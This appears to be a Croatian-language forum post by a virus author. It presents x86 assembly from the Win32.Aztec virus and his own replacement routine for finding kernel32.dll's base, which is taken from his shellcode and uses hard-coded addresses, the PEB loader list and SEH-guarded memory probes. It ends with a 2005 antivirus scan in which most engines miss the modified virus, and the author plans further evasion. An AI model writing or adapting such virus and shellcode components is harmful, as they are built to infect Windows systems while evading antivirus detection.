Još malo bruke.......užasno velike bruke :)
Dakle, na taj sors od Win32.Aztec, samo sam izmijenio fju kojom traži bazu od kernel32.dll:
;-----------------------------------------------------------------------
; GetK32 (Win32.Aztec original): locate the kernel32.dll image base.
; Calling convention is the virus's own, not a C ABI.
; In:    esi = start address of the downward scan; ecx = number of
;        64 KB steps to try (both come from the caller -- not visible here)
; Out:   eax = candidate image base: the first address whose leading
;        word is "MZ", or one of the hard-coded kernel_ / kernel_wNT
;        fallbacks when the scan is exhausted
; Clobb: esi, ecx, flags
; Analyst note: the MZ-compare loop stepping down in 64 KB units and the
; two fixed fallback addresses are the recognizable parts of this routine;
; the fallbacks are tied to specific Windows builds of the time.
;-----------------------------------------------------------------------
GetK32 proc
_@1: cmp word ptr [esi],"ZM"            ; DOS header signature "MZ" at esi ?
jz WeGotK32                             ; yes -> treat esi as the image base
_@2: sub esi,10000h                     ; no -> step down 64 KB (10000h)
loop _@1                                ; ecx-- ; keep scanning while ecx != 0
WeFailed:
mov ecx,cs                              ; scan exhausted: choose a fallback by OS family
xor cl,cl                               ; keep only the high byte of the CS selector
jecxz WeAreInWNT                        ; zero -> assumed NT (selector-value heuristic; presumably Win9x runs with a larger CS value -- not verifiable here)
mov esi,kernel_                         ; fallback base for the non-NT case (kernel_ equate)
jmp WeGotK32
WeAreInWNT:
mov esi,kernel_wNT                      ; fallback base for NT (kernel_wNT equate)
WeGotK32:
xchg eax,esi                            ; return value in eax; esi ends up holding the previous eax
ret
GetK32 endp
gdje su kernel_ i kernel_wNT predefinirani kao:
; Fallback kernel32.dll image bases used by GetK32 when its scan fails.
; Both are fixed addresses for particular Windows builds of the time; the
; first one also appears as the "95/98" row of the newer routine's table.
kernel_ equ 0BFF70000h                  ; kernel32 base assumed on the non-NT path
kernel_wNT equ 077F00000h               ; kernel32 base assumed on NT
(Ovaj školski virus je star ~5 god, imate sors u 29a #4)
E ja sam taj dio zamijenio sa svojom super-nadji-kernel32 fjom koju sam napravio za potrebe svog shellcode-a :) (sorry na lošem formatiranju, ne da mi se sad dotjerivat :) :
;-----------------------------------------------------------------------
; GetK32 (replacement): locate the kernel32.dll image base, trying in
; order (1) a table of hard-coded bases, (2) the PEB loader list,
; (3) an SEH-guarded read through undocumented PEB offsets, and
; (4) an unbounded downward scan starting from a return address found
; on the stack.  Calling convention is the routine's own, not a C ABI.
; In:    nothing in registers; step (4) reads a return address out of
;        the caller's stack frame (see __rec_scan), so the caller's
;        pushad / SEH / call layout must match the Pshd, Arg1 and cPushad
;        equates -- none of those equates are shown here.
; Out:   eax = kernel32 image base, i.e. an address that _krnl_check
;        accepted (PE signature present and OptionalHeader.ImageBase
;        equal to the address itself)
; Clobb: ebx, ecx, esi, flags (edx is saved/restored inside _krnl_check)
; Uses:  equates TEB_PEB, PEB_PebLdrData, PEB_LDR_InInitOrderModuleList,
;        LE_Flink, LDR_ModuleBase, LDR_InInitializationOrderLdrEnt,
;        EH_EstablisherFrame, MZ_lfanew, IMAGE_NT_SIGNATURE,
;        NT_OptionalHeader, OH_ImageBase, Pushad_ecx and the macro
;        @SEH_RemoveFrame -- all defined elsewhere in the source.
; Analyst note: the hard-coded table and the 64 KB downward scan only
; succeed when kernel32 sits at a fixed, build-specific address; the
; InInitializationOrder list walk and the SEH-wrapped memory probes are
; the parts worth recognizing when this routine shows up in a sample.
;-----------------------------------------------------------------------
GetK32:
call __tab ; kernel imagebase table for different versions of vindoze: (the call pushes the table's address, which __tab pops into esi)
dd 077E00000h ; NT/W2k
dd 077E80000h ; NT/W2k
dd 077ED0000h ; NT/W2k
dd 077F00000h ; NT/W2k
dd 0BFF70000h ; 95/98
dd 077E60000h ; XP home
dd 0BFF60000h ; Me
__tab: pop esi ; esi -> first table entry
push 7
pop ebx ; ebx = counter (7 table entries)
__nxt_base: dec ebx
lodsd ; take one imagebase: eax = next candidate, esi += 4
call _krnl_check ; and check it: ecx = 0 iff eax is a PE image whose header ImageBase == eax
jecxz __got_kernel ; ecx == 0 -> found, eax is the base
test ebx, ebx ; check table end
jnz __nxt_base
mov eax, fs:[TEB_PEB] ; take ptr to PEB (on NT; TEB_PEB equate not shown)
test eax, eax ; > 80000000h ? (sign bit of the pointer)
js __PEB_try ; !NT -- original assumes a high value means no usable PEB here; skip the loader-list walk
mov eax, [eax.PEB_PebLdrData] ; eax = PEB->Ldr
mov esi, [eax.PEB_LDR_InInitOrderModuleList.LE_Flink] ; esi = first entry of InInitializationOrderModuleList
lodsd ; go to second entry: eax = first entry's Flink (original assumes the second entry is kernel32 -- not verified here)
mov eax, [eax.LDR_ModuleBase-LDR_InInitializationOrderLdrEnt.LE_Flink] ; eax = that entry's DllBase (offset taken relative to the list-link field)
call _krnl_check
jecxz __got_kernel
__PEB_try: call __PEB_x ; pushes the address of the next line; that address becomes the SEH handler
mov esp,[esp.EH_EstablisherFrame] ; set SEH frame manually -- handler body: restore esp from the establisher frame
jmp __PEB_failed ; then join the common cleanup (NOTE(review): ecx is not set on this path; it holds whatever the exception dispatcher left in it -- confirm)
__PEB_x: xor eax, eax
push dword ptr fs:[eax] ; save the previous fs:[0]
mov fs:[eax], esp ; install the frame (handler = return address pushed by the call above)
mov eax, fs:[TEB_PEB] ; *PEB
mov eax, [eax+34h] ; undocumented, version-specific offsets; original expects them to lead to kernel32's base
mov eax, [eax+0b8h] ; now eax should be kernel's imagebase
call _krnl_check
__PEB_failed: @SEH_RemoveFrame ; macro (not shown): uninstall the frame pushed in __PEB_x
jecxz __got_kernel
__rec_scan: mov eax, [esp.(2*Pshd).Arg1.cPushad] ; take kernel return address. skip pushad, SEH and one call (depends on the caller's frame layout -- outside this listing)
and eax, -1 shl 16 ; align to 10 pages: clears the low 16 bits, i.e. rounds down to a 64 KB boundary
add eax, 2 shl 15 ; add 10 pages: +64 KB, undone by the first iteration of the loop below
__1: sub eax, 2 shl 15 ; and loop per 10 pages: step down 64 KB each iteration
call _krnl_check ; a fault on an unmapped address is absorbed by _krnl_check's own SEH frame
jecxz __got_kernel
jmp __1 ; we r gonna find that bloody kernel :)  (no lower bound: loops until a match is found)
__got_kernel: ret ; eax = kernel32 image base
;-----------------------------------------------------------------------
; _krnl_check: test whether eax is the base of a PE image that is mapped
; at its preferred address.
; In:    eax = candidate address (may be unmapped -- the reads are wrapped
;        in a temporary SEH frame)
; Out:   ecx = 0 when [eax] starts with a PE header whose
;        OptionalHeader.ImageBase equals eax; otherwise ecx = eax
;        (nonzero).  NOTE(review): on the exception path ecx is whatever
;        the dispatcher left in it when it invoked the handler -- this
;        routine does not assign it there; confirm.
; Clobb: ecx, flags; every other register is restored by pusha/popa
;-----------------------------------------------------------------------
_krnl_check: mov ecx, eax ; gotta set ecx so that we can return true (nonzero = "not kernel")
pusha ; snapshot all registers; ecx's slot is patched at __end_k
call __temp ; pushes the address of the next line = SEH handler
mov esp, [esp.EH_EstablisherFrame] ; set SEH manually -- handler body: restore esp from the establisher frame
jmp __end_k
__temp: xor edx, edx
push dword ptr fs:[edx] ; save the previous fs:[0]
mov fs:[edx], esp ; install the frame
mov edx, [eax.MZ_lfanew] ; take RVA to PE header
mov ebx, [edx+eax] ; check PE signature
xor ebx, 'SUN' ; indirectly: the two steps leave ebx == 0 iff the dword equals IMAGE_NT_SIGNATURE
sub ebx, IMAGE_NT_SIGNATURE xor 'SUN' ; lil sig -- the signature constant never appears literally in the code bytes
jnz __end_k ; not a PE header -> ecx stays nonzero
cmp eax, [edx+ecx.NT_OptionalHeader.OH_ImageBase] ; check the predefined imagebase (ecx == eax at this point)
jnz __end_k ; not loaded at its preferred base -> ecx stays nonzero
xor ecx, ecx ; both checks passed: ecx = 0 is the "found" value consumed by the caller's jecxz
__end_k: @SEH_RemoveFrame ; macro (not shown): uninstall the frame; presumably leaves esp at the pusha frame -- verify against the macro
mov [esp.Pushad_ecx], ecx ; patch ecx's slot in the pusha frame so popa returns the result
popa
__end: retn
Pošto je ona stara metoda donekle zastarjela...i opalim ja sken....i šta to moje oči vide:
Scan results
File: aztec.bin
Date: 02/09/2005 23:51:51 (GMT+1)
----
AntiVir 6.29.0.11/20050209 found nothing
AVG 718/20050207 found nothing
BitDefender 7.0/20050209 found nothing
ClamAV devel-20050130/20050209 found nothing
DrWeb 4.32b/20050209 found nothing
eTrust-Iris 7.1.194.0/20050209 found nothing
eTrust-Vet 11.7.0.0/20050209 found nothing
Fortinet 2.51/20050209 found nothing
F-Prot 3.16a/20050208 found [could be infected with an unknown virus]
Kaspersky 4.0.2.24/20050209 found nothing
NOD32v2 1.994/20050209 found [probably unknown WIN32 virus]
Norman 5.70.10/20050207 found nothing
Samo su Orion emulacijski engine iz f-prota i NOD32 u igri. A nisam ni počeo se igrati sa višenitnim stvarčicama, enkripcijom, pikanterijama OS-a... :>
Idemo dalje.